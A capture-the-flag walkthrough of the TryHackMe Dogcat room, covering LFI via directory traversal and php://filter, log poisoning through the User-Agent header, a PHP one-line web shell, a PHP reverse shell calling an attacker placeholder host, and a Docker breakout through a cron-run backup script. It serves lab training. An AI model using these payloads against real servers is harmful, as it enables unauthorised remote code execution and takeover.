In this walkthrough, we’ll explore the Dogcat room on TryHackMe, a box that features a Local File Inclusion (LFI) vulnerability and Docker privilege escalation. LFI allows us to read sensitive files from the system and eventually gain access to the server.There are a total of 4 flags in this machine which we need to find.
Let’s Dive in!
Step 1: Scanning the Target
Start by scanning the target machine to find open ports and services:
nmap -sV -p- <target-ip>
The scan reveals the following ports
Port 80: HTTP
Port 22: SSH
When you visit the website hosted on port 80, you’ll see a website which shows dog and cat pictures. Time to start web enumeration.
Step 2: Enumerating the Web
As we explore the Dogcat website, you’ll notice the URL follows a parameter-based format, which is a potential sign of vulnerabilities. Let’s test if we can exploit a Local File Inclusion (LFI) vulnerability to access sensitive files
While testing for Local File Inclusion (LFI) vulnerabilities in the Dogcat room, I noticed that using the ../ directory traversal method only works when the URL contains a “dog” or “cat” keyword.
resulted in “file cannot be opened” errors. However, when I tried this:
?view=dog/../index
it triggered an error:
Fatal error: Cannot redeclare containsStr()
This error occurs because the containsStr() function is being declared multiple times in the same file, likely due to the index.php file being included multiple times by the LFI payload.
After researching, I found that using the php://filter wrapper allows you to bypass this issue. The php://filter wrapper can read a file’s source code without executing it, which prevents the function re declaration error. By applying this technique, you can safely read the source of index.php and continue exploiting the LFI vulnerability.
<target-IP>/?view=php://filter/convert.base64-encode/resource=dog/../../.././…var/www/html/index
This will allow you to see the index file
The Code suggests that to make the LFI work on other files we will need to put another variable $ext in the URL.
Step 3: LFI (Local File Inclusion) to RCE( Remote code execution) – Log Poisoning
It took me some time to fully understand and exploit this vulnerability, but here’s the exact method that worked. A highly useful resource that helped me during this process was RevShells. This website allows you to generate different types of reverse shells easily and also provides options to encode and decode the payloads based on your requirements, making it invaluable for LFI exploitation and other penetration testing tasks.
Log poisoning is a powerful attack method where malicious input is injected into application logs, such as web server logs or application logs, with the intent of exploiting vulnerabilities like Local File Inclusion (LFI) or Remote Code Execution (RCE). Once an attacker is able to include or execute these poisoned logs via an LFI vulnerability, they can escalate the attack, potentially gaining full control over the target system.
I used Developer Tools to check for log poisoning by injecting the string “Hello World” into the User-Agent header. I used User-Agent header because it directly reflects in the access.log files. During the LFI attack, I observed that the string injected in the User-Agent was successfully reflected back, confirming the vulnerability and providing a foothold for further exploitation.
I tried reverse shell through User-Agent but that didn’t work.
Then I injected this payload in the log
<?php system($_GET['cmd']); ?>
The payload above leverages the cmd parameter in the URL, allowing it to be passed to the PHP system() function. This enables the execution of system commands directly on the target server, providing a way to exploit vulnerabilities and gain further access. By appending cmd to the URL, attackers can inject and execute arbitrary commands, making it a critical method in Remote Code Execution (RCE) attacks.
This is how to got first flag.
Step 4: Getting a Reverse Shell
After injecting system based payload getting a reverse shell was fairly easy. I used URL encoding of this payload to get a reverse shell:
php -r '$sock=fsockopen("attackerIP",attackerport);system("sh <&3 >&3 2>&3");
Turn up netcat listener on your machine:
You will get Flag2 if you do cd ../ in another file.
Step 5: Privilege Escalation
The sudo -l command is used to list the commands a user is allowed to run with sudo without providing their password, helping in privilege escalation assessments.
sudo -l
Step 6: Docker Breakout
In the description of this machine, you would have noticed that this is a Docker environment:
After looking around the system, I found there is a backup file in /opt.
Upon inspecting the launch.sh file, you’ll notice that a volume is mounted from the Docker container to the host system. This is key for potential exploitation. The backup.sh script creates a tar archive of the /root/container directory, which is a critical clue for privilege escalation.
Although running crontab -e didn’t show anything, it’s likely that the host OS is executing the backup.sh script. This presents an opportunity to inject a bash reverse shell into the script. Before injecting, ensure you have a Netcat listener set up on your chosen port, ready to catch the reverse shell.
Bash Command used:
After insertion of bash, this is what the /backup.sh file looked like.
You will have a reverse shell again but this time to the host machine!
That’s how you will get your 4th flag!